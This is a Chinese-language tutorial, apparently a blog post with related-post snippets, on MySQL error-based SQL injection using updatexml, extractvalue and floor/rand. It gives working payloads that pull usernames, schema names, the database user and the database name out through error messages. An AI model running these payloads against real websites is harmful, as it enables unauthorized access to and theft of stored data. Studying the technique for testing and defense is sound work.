報錯注入的三種格式:
第一種: updatexml 修改格式函式 修改格式不符合 報錯
函式解釋:
updatexml (xml_document, xpath_string, new_value);
第乙個引數:xml_document是string格式,第二個引數:xpath_string (xpath格式的字串) ,
第三個引數:new_value,string格式,替換查詢到的符合條件的資料
而我們的注入語句為:
select updatexml(1,concat(0x7e,(select username from security.users limit 0,1),0x7e),1);
其中的concat()函式是將其連成乙個字串,因此不會符合xpath_string的格式,從而出現格式錯誤,爆出
error 1105 (hy000): xpath syntax error: '~dumb~'
select updatexml(1,concat(0x7e,(構造語句)),1);
updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1)
第二種 extractvalue()函式報錯注入 查詢函式 不符合報錯
函式解釋:
extractvalue():從目標xml中返回包含所查詢值的字串。
extractvalue (xml_document, xpath_string);
第乙個引數:xml_document是string格式,為xml文件物件的名稱,文中為doc
第二個引數:xpath_string (xpath格式的字串)
concat:返回結果為連線引數產生的字串。
1' and extractvalue(1,concat(0x7e,user(),0x7e,database())) -- //爆資料庫資訊
1' and extractvalue(1,(構造語句))
第三種:floor()報錯注入語句格式:
函式解釋:
要求列數一致
SQL注入 報錯注入
乙個帶get引數的 並且不從資料庫返回資料,但存在報錯資訊 檢視字段情況 報錯注入語句格式 and 1 2 union select1,2,3 from select count concat floor rand 0 2 sql語句 a from information schema.tables...
SQL注入 報錯注入
sql注入基礎 盲注 用於注入結果無回顯但錯誤資訊有輸出的情況 floor函式 返回小於等於某值的整數,例如floor 1 則返回1,floor 1.9 也返回1 rand函式 生成隨機數.可指定seed,指定後每次生成的數都一樣即偽隨機,不指定seed則每次生成的隨機數都不一樣.通過floor和r...
SQL注入 報錯注入
利用 mysql select 1 from select count concat version floor rand 0 2 x from information schema.tables group by x a error 1062 23000 duplicate entry 5.1.4...